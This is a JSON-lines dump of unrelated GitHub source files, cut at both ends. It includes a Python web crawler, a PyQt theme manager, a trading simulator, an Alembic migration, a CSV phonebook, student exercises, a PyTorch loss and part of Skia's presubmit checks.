wallet.wallet.user)\n","repo_name":"lnbits/lnbits","sub_path":"lnbits/core/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":34994,"program_lang":"python","lang":"en","doc_type":"code","stars":882,"dataset":"github-code","pt":"52"} +{"seq_id":"9325806184","text":"import requests\nimport re\n\n\nclass WebCrawler:\n def __init__(self):\n self.discovered_sites = []\n\n def crawl(self, start_url):\n que = [start_url]\n self.discovered_sites.append(start_url)\n\n # breadth first search\n while que:\n actual_url = que.pop(0)\n print(actual_url)\n actual_url_html = self.read_html(actual_url)\n links = self.get_links(actual_url_html)\n for url in links:\n if url not in self.discovered_sites:\n self.discovered_sites.append(url)\n que.append(url)\n\n @staticmethod\n def get_links(html) -> list:\n return re.findall(r\"https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+\", html)\n\n @staticmethod\n def read_html(url) -> str:\n try:\n html = requests.get(url).text\n return html\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n crawler = WebCrawler()\n crawler.crawl('https://www.cnn.com')\n\n#\n","repo_name":"ideaguy3d/algos","sub_path":"@_Graphs/web_crawler.py","file_name":"web_crawler.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9217956094","text":"from __future__ import annotations\nfrom typehinting import startProgram\n\nfrom miscFunctions import miscFunctions\n\nfrom PyQt5 import QtGui\n\nfrom theme.darkTheme import darkTheme\nfrom theme.lightTheme import lightTheme\n\n# Fixing python to not be shit\ntrue = True;\nfalse = False;\n\nthemeConversion = {\n\t0: \"Dark\",\n\t1: \"Light\"\n}\n\nthemes = {\n\t\"Dark\": darkTheme(),\n\t\"Light\": lightTheme()\n};\n\nclass themeManager():\n\tdef __init__(this, self: startProgram) -> None:\n\t\tthis.functions = miscFunctions(self);\n\t\t\n\t\tthis.setTheme(self, \"main\");\n\t# End of function\n\n\n\tdef setTheme(this, self: startProgram, window: str, ) -> None:\n\t\tthemeString = this._themeConvert(self.settings[\"theme\"]);\n\t\t\n\t\tthemeClass: darkTheme | lightTheme;\n\t\tthemeClass = themes[themeString];\n\t\t\n\t\tif(window == \"main\"):\n\t\t\tthis._setIcons(self, themeString)\n\t\t\treturn themeClass.mainWindowTheme(self);\n\t\t\t\n\t\tif(window == \"world\"):\n\t\t\treturn themeClass.worldWindowTheme(self);\n\t\t\t\n\t\tif(window == \"credits\"):\n\t\t\treturn themeClass.creditWindowTheme(self);\n\t\t\t\n\t\tif(window == \"options\"):\n\t\t\treturn themeClass.optionsWindowTheme(self);\n\t\t\t\n\t\tif(window == \"person\"):\n\t\t\treturn themeClass.personWindowTheme(self);\n\t\t\t\n\t\tif(window == \"relation\"):\n\t\t\treturn themeClass.relationWindowTheme(self);\n\t# End of function\n\t\n\t\n\tdef _themeConvert(this, theme: int) -> str:\n\t\tthemeType = themeConversion[theme];\n\t\treturn themeType;\n\t# End of function\n\n\n\tdef _setIcons(this, self: startProgram, theme: str) -> None:\n\t\n\t\tself.deathIcon = this._QIcon(f\"icons\\\\dead_{theme}.png\");\n\t\t\n\t\t# Character related\n\t\tself.ui.actionAdd_Character.setIcon(this._QIcon(f\"icons\\\\addPerson_{theme}.png\"));\n\t\tself.ui.actionEdit_Character.setIcon(this._QIcon(f\"icons\\\\editCharacter_{theme}.png\"));\n\t\tself.ui.actionRemove_Character.setIcon(this._QIcon(f\"icons\\\\removeCharacter_{theme}.png\"));\n\n\t\t# File related\n\t\tself.ui.action_New.setIcon(this._QIcon(f\"icons\\\\new_{theme}.png\"));\n\t\tself.ui.action_Open.setIcon(this._QIcon(f\"icons\\\\open_{theme}.png\"));\n\t\tself.ui.action_Save.setIcon(this._QIcon(f\"icons\\\\save_{theme}.png\"));\n\t\tself.ui.actionSave_As.setIcon(this._QIcon(f\"icons\\\\saveAs_{theme}.png\"));\n\t\t\n\t\t# Misc\n\t\tself.ui.actionRefresh.setIcon(this._QIcon(f\"icons\\\\refresh_{theme}.png\"));\n\t\tself.ui.action_Credits.setIcon(this._QIcon(f\"icons\\\\about_{theme}.png\"));\n\t\tself.ui.action_config.setIcon(this._QIcon(f\"icons\\\\settings_{theme}.png\"));\n\t\tself.ui.action_Exit.setIcon(this._QIcon(f\"icons\\\\cancel_{theme}.png\"));\n\t# End of function\n\n\n\tdef _QIcon(this, file: str) -> QtGui.QIcon:\n\t\tpath = this.functions.resource_path(file)\n\t\ticon = QtGui.QIcon();\n\t\ticon.addPixmap(QtGui.QPixmap(path));\n\t\treturn icon;\n\t# End of function","repo_name":"Multarix/CharacterTracker","sub_path":"themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"74509072803","text":"#n번의 턴\n#4242\n#하나의 숫자가 m이상되면 stop\nn,m,k = map(int,input().split())\narr = list(map(int,input().split()))\nvisited = [0 for _ in range(n)]\npieces = [ 1 for _ in range(k)] #1,1,1\ncnt = 0\n\ndef calc():\n score = 0\n for piece in pieces:\n if piece >= m :\n score += 1\n return score\n\ndef find_max(index):\n global cnt\n cnt = max(cnt,calc())\n\n if index == n:\n return\n\n for i in range(k):\n if pieces[i] >= m:\n continue\n pieces[i] += arr[index]\n find_max(index+1)\n pieces[i] -= arr[index]\n\nfind_max(0)\nprint(cnt)\n\n\n","repo_name":"young0264/hellopycharm","sub_path":"코드트리/Back_Tracking/K개중하나를N번선택_COnditional/1차원윳놀이.py","file_name":"1차원윳놀이.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3072438681","text":"import pandas as pd\nimport numpy as np\n\nclass Trader():\n def __init__(self, stock, money, comis, printBool):\n self.stock = stock\n self.posVolume = 0\n self.printBool = printBool\n #self.Stock_Cash = []\n self.my_money = money #мои деньги которые никуда не вложены\n self.table = pd.DataFrame({'Date':[0], 'Stock_Cash':[0], \"My_money\":[self.my_money], \"Account_money\":[self.my_money] })\n self.table = self.table.set_index('Date')\n self.dater = []\n self.money_of_stock = 0 #стоимость вложений, используется только для записи в таблицу параметров счета\n self.start_money = 0 #нужен для вычисления шорта\n self.moneyOnStartDeal = 0\n self.state = ''\n self.comis = comis\n self.moexComis = 50\n #print(\"printBool------------------------------------------------------------------\", printBool)\n\n def calcComis(self, prices, volumes):\n return prices*volumes/100*self.comis + self.moexComis\n \n def buy(self, orderVolume, price):\n if self.posVolume < 0:\n if self.printBool == True:\n print(\"\\nBuy with price,\", price, \"Short_Close_Sum\", orderVolume * price, \"\\n\")# Здесь может и не закрыться шорт\n self.my_money = self.my_money + self.start_money + self.start_money - orderVolume * price - self.calcComis(price,orderVolume)\n self.posVolume = self.posVolume + orderVolume\n #print(\"self.posVolume\", self.posVolume)\n #print(\"buying+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n #self.Stock_Cash.append(self.posVolume * price)\n if self.posVolume > 0:\n #print(\"self.posVolume > 0\")\n #print(\"self.printBool == True\", self.printBool == True)\n if self.printBool == True:\n print(\"\\nBuy with price\", price, \"Open_Long_Sum\", orderVolume * price, \"\\n\" )\n self.state = 'Long'\n self.my_money = self.my_money - orderVolume * price - self.calcComis(price,orderVolume)\n if self.moneyOnStartDeal == 0:# то есть вычисляем только на первой покупке, при входе в позицию, если докупаем, то не считаем, так как нужно будет както усреднять\n self.moneyOnStartDeal = self.calcAccountMoney(price)\n elif self.posVolume == 0:\n self.state = ''\n self.start_money = 0\n self.moneyOnStartDeal = 0\n #print(\"stat0000000000000000000000000\")\n #return self.my_money\n\n def sell(self, orderVolume, price):\n if self.posVolume > 0:\n if self.printBool == True:\n print(\"\\nSell with price,\", price, \"Long_Close_Sum\", orderVolume * price, \"\\n\")\n self.my_money = self.my_money + orderVolume * price - self.calcComis(price,orderVolume)\n self.posVolume = self.posVolume - orderVolume\n elif self.posVolume == 0:\n self.posVolume = self.posVolume - orderVolume\n self.my_money = self.my_money - orderVolume * price - self.calcComis(price,orderVolume)\n if self.moneyOnStartDeal == 0:# то есть вычисляем только на первой продаже, при входе в позицию, если докупаем, то не считаем, так как нужно будет както усреднять\n self.moneyOnStartDeal = self.calcAccountMoney(price)\n if self.posVolume < 0:\n if self.printBool == True:\n print(\"\\nSell with price,\", price, \"Open_Short_sum\", orderVolume * price, \"\\n\")\n self.state = 'Short'\n self.start_money = abs(orderVolume * price)\n if self.printBool == True:\n print(\"SELL, self.start_money\", self.start_money, \"my_money\", self.my_money, \"\\n\")\n elif self.posVolume == 0:\n self.state = ''\n self.start_money = 0\n self.moneyOnStartDeal = 0\n \n def calcAccountMoney(self, price):\n #подсчитывает цену активов\n if self.state == 'Short':\n return self.start_money + self.start_money + self.posVolume * price + self.my_money\n else:\n #print(self.posVolume * price + self.my_money)\n return self.posVolume * price + self.my_money\n \n def quant_money(self, price, date_now):\n #обновляет таблицу по счетам\n self.money_of_stock =abs(self.posVolume * price)\n #self.Stock_Cash.append(self.posVolume * price)\n self.account_money = self.calcAccountMoney(price) #мои деньги и вложения\n if self.printBool == True:\n print(\"Quant money: Account_money\", self.account_money, \"posVolume*price\", self.posVolume*price, \"my_money, \", self.my_money, \"cur_price, \", price, \"\\n\")\n df = pd.DataFrame({\"Date\":[date_now],\n \"Stock_Cash\":[int(self.money_of_stock)],\n \"My_money\":[int(self.my_money)],\n \"Account_money\":[int(self.account_money)]})\n df = df.set_index('Date')\n #Некоторая обработка таблицы\n if self.table.iloc[0, 0] == 0:\n self.table.iloc[0, 0] = date_now\n if self.table.iloc[0, 0] == df.iloc[0, 0]:\n pass\n else:\n self.table = pd.concat([self.table, df])\n return self.getCurrentProfit(price)\n\n def getCashResult(self):\n cashFinal = self.table[\"Account_money\"].values[-1] - self.table[\"Account_money\"].values[0]\n return cashFinal\n \n def getAccountMoneyForCurrentData(self, data):\n #выдает сумму денег и активов на счете\n acm = self.table[\"Account_money\"].values[data]\n return acm\n \n def getCurrentProfit(self, price):\n #print(self.moneyOnStartDeal)\n #print(self.calcAccountMoney(price))\n #print(self.calcAccountMoney(price) - self.moneyOnStartDeal)\n return self.calcAccountMoney(price) - self.moneyOnStartDeal - self.calcComis(price, self.posVolume)\n ","repo_name":"gekator/Trader","sub_path":"Trader.py","file_name":"Trader.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73687772965","text":"\"\"\"empty message\n\nRevision ID: 69d355400a4c\nRevises: \nCreate Date: 2019-07-12 14:35:51.796141\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '69d355400a4c'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('TEST')\n op.alter_column('test', 'name',\n existing_type=mysql.VARCHAR(length=100),\n nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('test', 'name',\n existing_type=mysql.VARCHAR(length=100),\n nullable=True)\n op.create_table('TEST',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('name', mysql.VARCHAR(length=100), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n # ### end Alembic commands ###\n","repo_name":"findsarfaraz/arhamcollections","sub_path":"migrations/versions/69d355400a4c_.py","file_name":"69d355400a4c_.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16813200601","text":"import csv\nimport sys\n\ndef AddContact(): \n name = input(\"Имя: \").strip()\n number = int(input(\"Номер телефона: \").strip())\n \n # упорядочиваем в формате словаря\n contactInfo = dict(name=name, number=number)\n\n # эта же информация в csv файл\n with open('data.csv', 'a', newline='') as contact:\n fieldnames = ['name', 'number']\n writer = csv.DictWriter(contact, fieldnames=fieldnames)\n writer.writerow(contactInfo)\n\ndef ContactSearch():\n \n with open('data.csv', newline='') as file:\n # преобразуем csv в читаемый словарь\n reader = list(csv.DictReader(file))\n q = input(\"Введите имя или номер: \") # запрос поиска\n for i in range(0, len(reader)):\n if q in reader[i].values(): \n print((\"#\")*20, \"Результат поиска\", (\"#\")*20, end=None)\n result = reader[i].items()\n print(result)\n print((\"#\")*20, \"Готово\", (\"#\")*20, end=None)\n break\n if q not in reader[i].values():\n \n continue\n else:\n print((\"#\")*20, end=None)\n print(\"Контакт не найден!\")\n print((\"#\")*20, end=None)\n\n # запрос доп. действия\n search_query = input(\"Ищем ещё? Y/N: \")\n if search_query == 'Y':\n search = ContactSearch()\n elif search_query == 'N':\n\n print((\"*\")*20, end=None)\n\n search = \"Вы вышли из справочника\"\n print(search)\n print((\"*\")*20, end=None)\n \n sys.exit()\n return search\n\ndef contactdelete():\n lines = list()\n members = input(\"Введите удаляемый номер\")\n with open('data.csv', newline='') as delfile:\n reader = csv.reader(delfile)\n for row in reader:\n lines.append(row)\n for field in row:\n if field == members:\n lines.remove(row)\n\n # обновляем CSV\n with open(\"data.csv\", 'w', newline=\"\") as writeFile:\n writer = csv.writer(writeFile)\n writer.writerow(lines)\n print(\"удалено.\")\n print(lines)\n sys.exit()\n\ndef main():\n question = input(\n \"Что делаем? C: Добавляеи контакт, S: Поиск, D: Удаляем \")\n if question == \"C\":\n run_def = AddContact()\n elif question == \"S\":\n run_def = ContactSearch()\n elif question == \"D\":\n run_def = contactdelete()\n return run_def\n\nmain()","repo_name":"Basmixer/Python-HW","sub_path":"HW_phonebook/telephonebook.py","file_name":"telephonebook.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16424799748","text":"#Lab 3 - ITI1120 - Griffin Taylor\r\n#Exercise 1\r\ncounter = 10\r\nwhile(counter > 0):#Changed >= to > (only from 10 to 1, not 10 to 0)\r\n print(counter)\r\n counter = counter-1 #Changed + to -\r\n\r\n#Exercise 2\r\nn = int(input(\"Please give a value you would like to end at. \"))\r\ndef printerWhile(n):\r\n counter = 1\r\n while(counter<=n):\r\n print(counter)\r\n counter+=1\r\nprinterWhile(n)\r\ndef printerFor(n):\r\n for x in range (1,n+1):#Have to add +1 for inclusivity\r\n print(x)\r\nprinterFor(n)\r\n\r\nprint(\"\\n\")\r\n#Exercise 3\r\nimport random\r\nvalue = random.randint(1,10)\r\ndef guess(value):\r\n counter = 1\r\n gValue = int(input(\"Please guess a number between 1 and 10. \"))\r\n while(gValue!=value):\r\n counter+= 1\r\n if(gValue > value):\r\n print(\"Too large\")\r\n else:\r\n print(\"Too small\")\r\n gValue = int(input(\"That was incorrect, please guess again. \"))\r\n \r\n print(\"That was correct! It took you \"+str(counter),\"tries to guess it. \")\r\nguess(value)\r\n\r\nprint(\"\\n\")\r\n#Exercise 4\r\ninput4 = int(input(\"Provide a positive number. \"))\r\nwhile(input4<0):\r\n input4 = int(input(\"That is negative. Please provide a positive number. \"))\r\ndef ComputeFact(input4):\r\n factorial = 1\r\n if(input4 > 1):\r\n for x in range(2,input4+1):\r\n factorial*= x\r\n print(\"The factorial of \"+str(input4),\"is \"+str(factorial))\r\nComputeFact(input4)\r\n","repo_name":"Zander-9909/University-Work","sub_path":"ITI1120/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73563236006","text":"\"\"\"\nModule: loss.py\nAuthors: Christian Bergler, Manuel Schmitt, Hendrik Schroeter\nLicense: GNU General Public License v3.0\nInstitution: Friedrich-Alexander-University Erlangen-Nuremberg, Department of Computer Science, Pattern Recognition Lab\nLast Access: 26.04.2022\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\n\n\nclass DeepFeatureLoss(nn.Module):\n \"\"\"Reduces the loss for parts where the ground truth spectrogram is 0 for all\n frequencies.\n \"\"\"\n\n def __init__(self, freq_dim=-1, reduction=\"elementwise_mean\"):\n super().__init__()\n self.mse = nn.MSELoss(reduction=\"none\")\n self.freq_dim = freq_dim\n self.reduction = reduction\n\n def __call__(self, recon_x, x):\n mse_ = self.mse(recon_x, x).sum(dim=self.freq_dim)\n mse_tmp = mse_.clone()\n relevant = torch.where(\n torch.gt(x.sum(dim=self.freq_dim), 0.), mse_, mse_tmp.mul_(0.1)\n )\n if self.reduction == \"elementwise_mean\":\n relevant = relevant.mean()\n elif self.reduction == \"sum\":\n relevant = relevant.sum()\n\n return relevant\n","repo_name":"ChristianBergler/ORCA-SLANG","sub_path":"orca-slang/models/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"12740930825","text":"import collections\nimport csv\nimport fnmatch\nimport os\nimport re\nimport subprocess\nimport sys\nimport traceback\n\n\nREVERT_CL_SUBJECT_PREFIX = 'Revert '\n\nSKIA_TREE_STATUS_URL = 'http://skia-tree-status.appspot.com'\n\n# Please add the complete email address here (and not just 'xyz@' or 'xyz').\nPUBLIC_API_OWNERS = (\n 'reed@chromium.org',\n 'reed@google.com',\n 'bsalomon@chromium.org',\n 'bsalomon@google.com',\n 'djsollen@chromium.org',\n 'djsollen@google.com',\n 'hcm@chromium.org',\n 'hcm@google.com',\n)\n\nAUTHORS_FILE_NAME = 'AUTHORS'\n\nDOCS_PREVIEW_URL = 'https://skia.org/?cl='\nGOLD_TRYBOT_URL = 'https://gold.skia.org/search?issue='\n\n# Path to CQ bots feature is described in https://bug.skia.org/4364\nPATH_PREFIX_TO_EXTRA_TRYBOTS = {\n 'src/opts/': ('skia.primary:'\n 'Test-Debian9-Clang-GCE-CPU-AVX2-x86_64-Release-All-SKNX_NO_SIMD'),\n 'include/private/SkAtomics.h': ('skia.primary:'\n 'Test-Debian9-Clang-GCE-CPU-AVX2-x86_64-Release-All-TSAN,'\n 'Test-Ubuntu17-Clang-Golo-GPU-QuadroP400-x86_64-Release-All-TSAN'\n ),\n\n # Below are examples to show what is possible with this feature.\n # 'src/svg/': 'master1:abc;master2:def',\n # 'src/svg/parser/': 'master3:ghi,jkl;master4:mno',\n # 'src/image/SkImage_Base.h': 'master5:pqr,stu;master1:abc1;master2:def',\n}\n\nSERVICE_ACCOUNT_SUFFIX = [\n '@%s.iam.gserviceaccount.com' % project for project in [\n 'skia-buildbots.google.com', 'skia-swarming-bots']]\n\n\ndef _CheckChangeHasEol(input_api, output_api, source_file_filter=None):\n \"\"\"Checks that files end with atleast one \\n (LF).\"\"\"\n eof_files = []\n for f in input_api.AffectedSourceFiles(source_file_filter):\n contents = input_api.ReadFile(f, 'rb')\n # Check that the file ends in atleast one newline character.\n if len(contents) > 1 and contents[-1:] != '\\n':\n eof_files.append(f.LocalPath())\n\n if eof_files:\n return [output_api.PresubmitPromptWarning(\n 'These files should end in a newline character:',\n items=eof_files)]\n return []\n\n\ndef _PythonChecks(input_api, output_api):\n \"\"\"Run checks on any modified Python files.\"\"\"\n pylint_disabled_files = (\n 'infra/bots/recipes.py',\n )\n pylint_disabled_warnings = (\n 'F0401', # Unable to import.\n 'E0611', # No name in module.\n 'W0232', # Class has no __init__ method.\n 'E1002', # Use of super on an old style class.\n 'W0403', # Relative import used.\n 'R0201', # Method could be a function.\n 'E1003', # Using class name in super.\n 'W0613', # Unused argument.\n 'W0105', # String statement has no effect.\n )\n # Run Pylint on only the modified python files. Unfortunately it still runs\n # Pylint on the whole file instead of just the modified lines.\n affected_python_files = []\n for affected_file in input_api.AffectedSourceFiles(None):\n affected_file_path = affected_file.LocalPath()\n if affected_file_path.endswith('.py'):\n if affected_file_path not in pylint_disabled_files:\n affected_python_files.append(affected_file_path)\n return input_api.canned_checks.RunPylint(\n input_api, output_api,\n disabled_warnings=pylint_disabled_warnings,\n white_list=affected_python_files)\n\n\ndef _JsonChecks(input_api, output_api):\n \"\"\"Run checks on any modified json files.\"\"\"\n failing_files = []\n for affected_file in input_api.AffectedFiles(None):\n affected_file_path = affected_file.LocalPath()\n is_json = affected_file_path.endswith('.json')\n is_metadata = (affected_file_path.startswith('site/') and\n affected_file_path.endswith('/METADATA'))\n if is_json or is_metadata:\n try:\n input_api.json.load(open(affected_file_path, 'r'))\n except ValueError:\n failing_files.append(affected_file_path)\n\n results = []\n if failing_files:\n results.append(\n output_api.PresubmitError(\n 'The following files contain invalid json:\\n%s\\n\\n' %\n '\\n'.join(failing_files)))\n return results\n\n\ndef _IfDefChecks(input_api, output_api):\n \"\"\"Ensures if/ifdef are not before includes. See skbug/3362 for details.\"\"\"\n comment_block_start_pattern = re.compile('^\\s*\\/\\*.*$')\n comment_block_middle_pattern = re.compile('^\\s+\\*.*')\n comment_block_end_pattern = re.compile('^\\s+\\*\\/.*$')\n single_line_comment_pattern = re.compile('^\\s*//.*$')\n def is_comment(line):\n return (comment_block_start_pattern.match(line) or\n comment_block_middle_pattern.match(line) or\n comment_block_end_pattern.match(line) or\n single_line_comment_pattern.match(line))\n\n empty_line_pattern = re.compile('^\\s*$')\n def is_empty_line(line):\n return empty_line_pattern.match(line)\n\n failing_files = []\n for affected_file in input_api.AffectedSourceFiles(None):\n affected_file_path = affected_file.LocalPath()\n if affected_file_path.endswith('.cpp') or affected_file_path.endswith('.h'):\n f = open(affected_file_path)\n for line in f.xreadlines():\n if is_comment(line) or is_empty_line(line):\n continue\n # The below will be the first real line after comments and newlines.\n if line.startswith('#if 0 '):\n pass\n elif line.startswith('#if ') or line.startswith('#ifdef '):\n failing_files.append(affected_file_path)\n break\n\n results = []\n if failing_files:\n results.append(\n output_api.PresubmitError(\n 'The following files have #if or #ifdef before includes:\\n%s\\n\\n'\n 'See https://bug.skia.org/3362 for why this should be fixed.' %\n '\\n'.join(failing_files)))\n return results\n\n\ndef _CopyrightChecks(input_api, output_api, source_file_filter=None):\n results = []\n year_pattern = r'\\d{4}'\n year_range_pattern = r'%s(-%s)?' % (year_pattern, year_pattern)\n years_pattern = r'%s(,%s)*,?' % (year_range_pattern, year_range_pattern)\n copyright_pattern = (\n r'Copyright (\\([cC]\\) )?%s \\w+' % years_pattern)\n\n for affected_file in input_api.AffectedSourceFiles(source_file_filter):\n if 'third_party' in affected_file.LocalPath():\n continue\n contents = input_api.ReadFile(affected_file, 'rb')\n if not re.search(copyright_pattern, contents):\n results.append(output_api.PresubmitError(\n '%s is missing a correct copyright header.' % affected_file))\n return results\n\n\ndef _ToolFlags(input_api, output_api):\n \"\"\"Make sure `{dm,nanobench}_flags.py test` passes if modified.\"\"\"\n results = []\n sources = lambda x: ('dm_flags.py' in x.LocalPath() or\n 'nanobench_flags.py' in x.LocalPath())\n for f in input_api.AffectedSourceFiles(sources):\n if 0 != subprocess.call(['python', f.LocalPath(), 'test']):\n results.append(output_api.PresubmitError('`python %s test` failed' % f))\n return results\n\n\ndef _InfraTests(input_api, output_api):\n \"\"\"Run the infra tests.\"\"\"\n results = []\n if not any(f.LocalPath().startswith('infra')\n for f in input_api.AffectedFiles()):\n return results\n\n cmd = ['python', os.path.join('infra', 'bots', 'infra_tests.py')]\n try:\n subprocess.check_output(cmd)\n except subprocess.CalledProcessError as e:\n results.append(output_api.PresubmitError(\n '`%s` failed:\\n%s' % (' '.join(cmd), e.output)))\n return results\n\n\ndef _CheckGNFormatted(input_api, output_api):\n \"\"\"Make sure any .gn files we're changing have been formatted.\"\"\"\n results = []\n for f in input_api.AffectedFiles():\n if (not f.LocalPath().endswith('.gn') and\n not f.LocalPath().endswith('.gni')):\n continue\n\n gn = 'gn.bat' if 'win32' in sys.platform else 'gn'\n cmd = [gn, 'format', '--dry-run', f.LocalPath()]\n try:\n subprocess.check_output(cmd)\n except subprocess.CalledProcessError:\n fix = 'gn format ' + f.LocalPath()\n results.append(output_api.PresubmitError(\n '`%s` failed, try\\n\\t%s' % (' '.join(cmd), fix)))\n return results\n\n\ndef _CommonChecks(input_api, output_api):\n \"\"\"Presubmit checks common to upload and commit.\"\"\"\n results = []\n sources = lambda x: (x.LocalPath().endswith('.h') or\n x.LocalPath().endswith('.py') or\n x.LocalPath().endswith('.sh') or\n x.LocalPath().endswith('.m') or\n x.LocalPath().endswith('.mm') or\n x.LocalPath().endswith('.go') or\n x.LocalPath().endswith('.c') or\n x.LocalPath().endswith('.cc') or\n x.LocalPath().endswith('.cpp'))\n results.extend(\n _CheckChangeHasEol(\n input_api, output_api, source_file_filter=sources))\n results.extend(\n input_api.canned_checks.CheckChangeHasNoCR(\n input_api, output_api, source_file_filter=sources))\n results.extend(\n input_api.canned_checks.CheckChangeHasNoStrayWhitespace(\n input_api, output_api, source_file_filter=sources))\n results.extend(_PythonChecks(input_api, output_api))\n results.extend(_JsonChecks(input_api, output_api))\n results.extend(_IfDefChecks(input_api, output_api))\n results.extend(_CopyrightChecks(input_api, output_api,\n source_file_filter=sources))\n results.extend(_ToolFlags(input_api, output_api))\n return results\n\n\ndef CheckChangeOnUpload(input_api, output_api):\n \"\"\"Presubmit checks for the change on upload.\n\n The following are the presubmit checks:\n * Check change has one and only one EOL.\n \"\"\"\n results = []\n results.extend(_CommonChecks(input_api, output_api))\n # Run on upload, not commit, since the presubmit bot apparently doesn't have\n # coverage or Go installed.\n results.extend(_InfraTests(input_api, output_api))\n\n results.extend(_CheckGNFormatted(input_api, output_api))\n return results\n\n\ndef _CheckTreeStatus(input_api, output_api, json_url):\n \"\"\"Check whether to allow commit.\n\n Args:\n input_api: input related apis.\n output_api: output related apis.\n json_url: url to download json style status.\n \"\"\"\n tree_status_results = input_api.canned_checks.CheckTreeIsOpen(\n input_api, output_api, json_url=json_url)\n if not tree_status_results:\n # Check for caution state only if tree is not closed.\n connection = input_api.urllib2.urlopen(json_url)\n status = input_api.json.loads(connection.read())\n connection.close()\n if ('caution' in status['message'].lower() and\n os.isatty(sys.stdout.fileno())):\n # Display a prompt only if we are in an interactive shell. Without this\n # check the commit queue behaves incorrectly because it considers\n # prompts to be failures.\n short_text = 'Tree state is: ' + status['general_state']\n long_text = status['message'] + '\\n' + json_url\n tree_status_results.append(\n output_api.PresubmitPromptWarning(\n message=short_text, long_text=long_text))\n else:\n # Tree status is closed. Put in message about contacting sheriff.\n connection = input_api.urllib2.urlopen(\n SKIA_TREE_STATUS_URL + '/current-sheriff')\n sheriff_details = input_api.json.loads(connection.read())\n if sheriff_details:\n tree_status_results[0]._message += (\n '\\n\\nPlease contact the current Skia sheriff (%s) if you are trying '\n 'to submit a build fix\\nand do not know how to submit because the '\n 'tree is closed') % sheriff_details['username']\n return tree_status_results\n\n\nclass CodeReview(object):\n \"\"\"Abstracts which codereview tool is used for the specified issue.\"\"\"\n\n def __init__(self, input_api):\n self._issue = input_api.change.issue\n self._gerrit = input_api.gerrit\n\n def GetOwnerEmail(self):\n return self._gerrit.GetChangeOwner(self._issue)\n\n def GetSubject(self):\n return self._gerrit.GetChangeInfo(self._issue)['subject']\n\n def GetDescription(self):\n return self._gerrit.GetChangeDescription(self._issue)\n\n def IsDryRun(self):\n return self._gerrit.GetChangeInfo(\n self._issue)['labels']['Commit-Queue'].get('value', 0) == 1\n\n def GetReviewers(self):\n code_review_label = (\n self._gerrit.GetChangeInfo(self._issue)['labels']['Code-Review'])\n return [r['email'] for r in code_review_label.get('all', [])]\n\n def GetApprovers(self):\n approvers = []\n code_review_label = (\n self._gerrit.GetChangeInfo(self._issue)['labels']['Code-Review'])\n for m in code_review_label.get('all', []):\n if m.get(\"value\") == 1:\n approvers.append(m[\"email\"])\n return approvers\n\n\ndef _CheckOwnerIsInAuthorsFile(input_api, output_api):\n results = []\n if input_api.change.issue:\n cr = CodeReview(input_api)\n\n owner_email = cr.GetOwnerEmail()\n\n # Service accounts don't need to be in AUTHORS.\n for suffix in SERVICE_ACCOUNT_SUFFIX:\n if owner_email.endswith(suffix):\n return results\n\n try:\n authors_content = ''\n for line in open(AUTHORS_FILE_NAME):\n if not line.startswith('#'):\n authors_content += line\n email_fnmatches = re.findall('<(.*)>', authors_content)\n for email_fnmatch in email_fnmatches:\n if fnmatch.fnmatch(owner_email, email_fnmatch):\n # Found a match, the user is in the AUTHORS file break out of the loop\n break\n else:\n results.append(\n output_api.PresubmitError(\n 'The email %s is not in Skia\\'s AUTHORS file.\\n'\n 'Issue owner, this CL must include an addition to the Skia AUTHORS '\n 'file.'\n % owner_email))\n except IOError:\n # Do not fail if authors file cannot be found.\n traceback.print_exc()\n input_api.logging.error('AUTHORS file not found!')\n\n return results\n\n\ndef _CheckLGTMsForPublicAPI(input_api, output_api):\n \"\"\"Check LGTMs for public API changes.\n\n For public API files make sure there is an LGTM from the list of owners in\n PUBLIC_API_OWNERS.\n \"\"\"\n results = []\n requires_owner_check = False\n for affected_file in input_api.AffectedFiles():\n affected_file_path = affected_file.LocalPath()\n file_path, file_ext = os.path.splitext(affected_file_path)\n # We only care about files that end in .h and are under the top-level\n # include dir, but not include/private.\n if (file_ext == '.h' and\n 'include' == file_path.split(os.path.sep)[0] and\n 'private' not in file_path):\n requires_owner_check = True\n\n if not requires_owner_check:\n return results\n\n lgtm_from_owner = False\n if input_api.change.issue:\n cr = CodeReview(input_api)\n\n if re.match(REVERT_CL_SUBJECT_PREFIX, cr.GetSubject(), re.I):\n # It is a revert CL, ignore the public api owners check.\n return results\n\n if cr.IsDryRun():\n # Ignore public api owners check for dry run CLs since they are not\n # going to be committed.\n return results\n\n if input_api.gerrit:\n for reviewer in 